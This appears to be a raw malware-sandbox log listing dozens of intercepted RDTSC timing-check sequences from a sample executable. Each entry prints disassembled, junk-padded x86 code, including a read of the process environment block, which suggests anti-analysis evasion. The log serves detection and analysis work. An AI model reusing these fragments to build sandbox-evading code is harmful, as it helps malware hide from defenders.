Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 18D56F5 second address: 18D578B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC7F4EE1C46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jl 00007FC7F4EE1C4Eh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FC7F4EE1C48h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d push 00000004h 0x0000002f pushad 0x00000030 mov ax, bx 0x00000033 popad 0x00000034 call 00007FC7F4EE1C49h 0x00000039 jng 00007FC7F4EE1C4Ah 0x0000003f push ebx 0x00000040 pushad 0x00000041 popad 0x00000042 pop ebx 0x00000043 push eax 0x00000044 jnp 00007FC7F4EE1C54h 0x0000004a mov eax, dword ptr [esp+04h] 0x0000004e push edx 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 pushad 0x00000053 popad 0x00000054 popad 0x00000055 pop edx 0x00000056 mov eax, dword ptr [eax] 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FC7F4EE1C58h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 18D8773 second address: 18D8788 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push esi 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 18D82A6 second address: 18D82B9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC7F4EE1C46h 0x00000008 jl 00007FC7F4EE1C46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 18D82B9 second address: 18D82C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16CE410 second address: 16CE416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660008 second address: 766000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766000C second address: 7660012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660012 second address: 7660035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC7F4B4AE82h 0x00000008 pop ecx 0x00000009 movsx edx, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660035 second address: 7660039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660039 second address: 7660048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660048 second address: 766004E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766004E second address: 7660052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660052 second address: 7660056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660056 second address: 766007F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007FC7F4B4AE7Ah 0x00000012 xor esi, 747EAA78h 0x00000018 jmp 00007FC7F4B4AE7Bh 0x0000001d popfd 0x0000001e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766007F second address: 7660083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660083 second address: 76600C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FC7F4B4AE86h 0x0000000c adc ch, FFFFFFD8h 0x0000000f jmp 00007FC7F4B4AE7Bh 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC7F4B4AE85h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76600C8 second address: 76600EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC7F4EE1C4Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76600EE second address: 7660166 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7F4B4AE87h 0x00000009 xor ecx, 0FA09A5Eh 0x0000000f jmp 00007FC7F4B4AE89h 0x00000014 popfd 0x00000015 jmp 00007FC7F4B4AE80h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov eax, dword ptr fs:[00000030h] 0x00000023 pushad 0x00000024 mov ebx, eax 0x00000026 push esi 0x00000027 mov bx, 039Ch 0x0000002b pop edx 0x0000002c popad 0x0000002d sub esp, 18h 0x00000030 jmp 00007FC7F4B4AE80h 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660166 second address: 766016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766016A second address: 7660187 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660187 second address: 766018D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766018D second address: 766020D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC7F4B4AE86h 0x0000000e xchg eax, ebx 0x0000000f jmp 00007FC7F4B4AE80h 0x00000014 mov ebx, dword ptr [eax+10h] 0x00000017 jmp 00007FC7F4B4AE80h 0x0000001c xchg eax, esi 0x0000001d jmp 00007FC7F4B4AE80h 0x00000022 push eax 0x00000023 pushad 0x00000024 jmp 00007FC7F4B4AE81h 0x00000029 jmp 00007FC7F4B4AE80h 0x0000002e popad 0x0000002f xchg eax, esi 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov ax, bx 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766020D second address: 7660213 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660213 second address: 76602EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [762C06ECh] 0x00000011 jmp 00007FC7F4B4AE86h 0x00000016 test esi, esi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FC7F4B4AE7Eh 0x0000001f and al, 00000058h 0x00000022 jmp 00007FC7F4B4AE7Bh 0x00000027 popfd 0x00000028 jmp 00007FC7F4B4AE88h 0x0000002d popad 0x0000002e jne 00007FC7F4B4BCB7h 0x00000034 jmp 00007FC7F4B4AE80h 0x00000039 xchg eax, edi 0x0000003a jmp 00007FC7F4B4AE80h 0x0000003f push eax 0x00000040 pushad 0x00000041 pushad 0x00000042 pushfd 0x00000043 jmp 00007FC7F4B4AE87h 0x00000048 or eax, 75393ADEh 0x0000004e jmp 00007FC7F4B4AE89h 0x00000053 popfd 0x00000054 pushad 0x00000055 popad 0x00000056 popad 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76602EE second address: 766031A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 xchg eax, edi 0x00000007 jmp 00007FC7F4EE1C56h 0x0000000c call dword ptr [76290B60h] 0x00000012 mov eax, 75A0E5E0h 0x00000017 ret 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ecx, edi 0x0000001d movsx edx, ax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766031A second address: 76603A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000044h 0x0000000b pushad 0x0000000c call 00007FC7F4B4AE7Bh 0x00000011 mov bh, ch 0x00000013 pop edi 0x00000014 popad 0x00000015 pop edi 0x00000016 pushad 0x00000017 mov cl, AEh 0x00000019 pushfd 0x0000001a jmp 00007FC7F4B4AE83h 0x0000001f adc esi, 7887705Eh 0x00000025 jmp 00007FC7F4B4AE89h 0x0000002a popfd 0x0000002b popad 0x0000002c xchg eax, edi 0x0000002d jmp 00007FC7F4B4AE7Eh 0x00000032 push eax 0x00000033 jmp 00007FC7F4B4AE7Bh 0x00000038 xchg eax, edi 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FC7F4B4AE85h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660499 second address: 76604CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FC863AC0E38h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC7F4EE1C4Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76604CB second address: 76604FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 6972DED2h 0x00000008 mov dx, 161Eh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, 00000000h 0x00000014 pushad 0x00000015 mov edi, eax 0x00000017 mov al, 23h 0x00000019 popad 0x0000001a mov dword ptr [esi], edi 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC7F4B4AE82h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766066A second address: 76606CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov ebx, 34973A16h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esi+1Ch], eax 0x00000011 pushad 0x00000012 pushad 0x00000013 mov bx, A11Ch 0x00000017 push edi 0x00000018 pop esi 0x00000019 popad 0x0000001a mov edx, 70B9F7B4h 0x0000001f popad 0x00000020 mov eax, dword ptr [ebx+5Ch] 0x00000023 jmp 00007FC7F4EE1C53h 0x00000028 mov dword ptr [esi+20h], eax 0x0000002b jmp 00007FC7F4EE1C56h 0x00000030 mov eax, dword ptr [ebx+60h] 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 call 00007FC7F4EE1C4Dh 0x0000003b pop ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76606CF second address: 76606D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76606D4 second address: 76607A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7F4EE1C4Ah 0x00000008 mov ebx, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+24h], eax 0x00000010 pushad 0x00000011 push esi 0x00000012 pushfd 0x00000013 jmp 00007FC7F4EE1C59h 0x00000018 add si, 5F96h 0x0000001d jmp 00007FC7F4EE1C51h 0x00000022 popfd 0x00000023 pop eax 0x00000024 call 00007FC7F4EE1C51h 0x00000029 mov ch, 6Ch 0x0000002b pop edi 0x0000002c popad 0x0000002d mov eax, dword ptr [ebx+64h] 0x00000030 pushad 0x00000031 pushad 0x00000032 mov eax, ebx 0x00000034 popad 0x00000035 pushfd 0x00000036 jmp 00007FC7F4EE1C57h 0x0000003b jmp 00007FC7F4EE1C53h 0x00000040 popfd 0x00000041 popad 0x00000042 mov dword ptr [esi+28h], eax 0x00000045 pushad 0x00000046 push eax 0x00000047 pushfd 0x00000048 jmp 00007FC7F4EE1C4Bh 0x0000004d add al, FFFFFF8Eh 0x00000050 jmp 00007FC7F4EE1C59h 0x00000055 popfd 0x00000056 pop ecx 0x00000057 movsx edx, cx 0x0000005a popad 0x0000005b mov eax, dword ptr [ebx+68h] 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76607A3 second address: 76607A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76607A7 second address: 76607AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76607AB second address: 76607B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76607B1 second address: 76607EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+2Ch], eax 0x0000000c pushad 0x0000000d mov cx, A14Dh 0x00000011 mov ah, 05h 0x00000013 popad 0x00000014 mov ax, word ptr [ebx+6Ch] 0x00000018 jmp 00007FC7F4EE1C55h 0x0000001d mov word ptr [esi+30h], ax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76607EF second address: 76607F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76607F3 second address: 76607F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76607F9 second address: 766083A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, esi 0x00000005 pushfd 0x00000006 jmp 00007FC7F4B4AE7Ch 0x0000000b jmp 00007FC7F4B4AE85h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov ax, word ptr [ebx+00000088h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC7F4B4AE7Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766083A second address: 766089D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+32h], ax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FC7F4EE1C53h 0x00000014 add ax, C3CEh 0x00000019 jmp 00007FC7F4EE1C59h 0x0000001e popfd 0x0000001f popad 0x00000020 mov eax, dword ptr [ebx+0000008Ch] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FC7F4EE1C4Dh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766089D second address: 76608E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c pushad 0x0000000d mov edi, ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007FC7F4B4AE86h 0x00000017 and ecx, 4D4FC9D8h 0x0000001d jmp 00007FC7F4B4AE7Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76608E3 second address: 7660993 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, dword ptr [ebx+18h] 0x0000000b jmp 00007FC7F4EE1C4Bh 0x00000010 mov dword ptr [esi+38h], eax 0x00000013 pushad 0x00000014 movzx eax, dx 0x00000017 pushfd 0x00000018 jmp 00007FC7F4EE1C51h 0x0000001d and ecx, 4128C426h 0x00000023 jmp 00007FC7F4EE1C51h 0x00000028 popfd 0x00000029 popad 0x0000002a mov eax, dword ptr [ebx+1Ch] 0x0000002d pushad 0x0000002e mov bx, cx 0x00000031 pushfd 0x00000032 jmp 00007FC7F4EE1C58h 0x00000037 sbb eax, 1075B8F8h 0x0000003d jmp 00007FC7F4EE1C4Bh 0x00000042 popfd 0x00000043 popad 0x00000044 mov dword ptr [esi+3Ch], eax 0x00000047 jmp 00007FC7F4EE1C56h 0x0000004c mov eax, dword ptr [ebx+20h] 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FC7F4EE1C57h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660993 second address: 7660A4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+40h], eax 0x0000000c pushad 0x0000000d mov ax, 9383h 0x00000011 pushad 0x00000012 mov dh, ah 0x00000014 mov ecx, ebx 0x00000016 popad 0x00000017 popad 0x00000018 lea eax, dword ptr [ebx+00000080h] 0x0000001e jmp 00007FC7F4B4AE7Dh 0x00000023 push 00000001h 0x00000025 jmp 00007FC7F4B4AE7Eh 0x0000002a nop 0x0000002b jmp 00007FC7F4B4AE80h 0x00000030 push eax 0x00000031 jmp 00007FC7F4B4AE7Bh 0x00000036 nop 0x00000037 jmp 00007FC7F4B4AE86h 0x0000003c lea eax, dword ptr [ebp-10h] 0x0000003f jmp 00007FC7F4B4AE80h 0x00000044 nop 0x00000045 jmp 00007FC7F4B4AE80h 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FC7F4B4AE7Eh 0x00000052 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660AAA second address: 7660AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660AB0 second address: 7660B0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007FC7F4B4AE80h 0x00000010 js 00007FC863729A61h 0x00000016 jmp 00007FC7F4B4AE80h 0x0000001b mov eax, dword ptr [ebp-0Ch] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC7F4B4AE87h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660B0A second address: 7660B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660B10 second address: 7660B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660B14 second address: 7660B5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e pushad 0x0000000f mov ax, 8EBBh 0x00000013 mov ah, 5Bh 0x00000015 popad 0x00000016 lea eax, dword ptr [ebx+78h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e pushfd 0x0000001f jmp 00007FC7F4EE1C52h 0x00000024 and al, 00000038h 0x00000027 jmp 00007FC7F4EE1C4Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660B5B second address: 7660B73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7F4B4AE84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660B73 second address: 7660B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660B77 second address: 7660B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC7F4B4AE7Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660B8D second address: 7660B93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660B93 second address: 7660B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660B97 second address: 7660B9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660B9B second address: 7660BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC7F4B4AE86h 0x0000000e mov dword ptr [esp], eax 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FC7F4B4AE7Eh 0x00000018 add cl, 00000058h 0x0000001b jmp 00007FC7F4B4AE7Bh 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 call 00007FC7F4B4AE86h 0x00000028 pop eax 0x00000029 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660C63 second address: 7660CD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FC7F4EE1C4Dh 0x0000000b adc ax, 8BC6h 0x00000010 jmp 00007FC7F4EE1C51h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov edi, eax 0x0000001b jmp 00007FC7F4EE1C4Eh 0x00000020 test edi, edi 0x00000022 jmp 00007FC7F4EE1C50h 0x00000027 js 00007FC863AC064Dh 0x0000002d jmp 00007FC7F4EE1C50h 0x00000032 mov eax, dword ptr [ebp-04h] 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FC7F4EE1C4Ah 0x0000003e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660CD9 second address: 7660CDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660CDF second address: 7660CE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660CE5 second address: 7660CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660CE9 second address: 7660D33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+08h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FC7F4EE1C4Dh 0x00000017 xor cl, 00000046h 0x0000001a jmp 00007FC7F4EE1C51h 0x0000001f popfd 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660D33 second address: 7660D68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC7F4B4AE85h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660D68 second address: 7660D6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660D6E second address: 7660D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660D72 second address: 7660D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
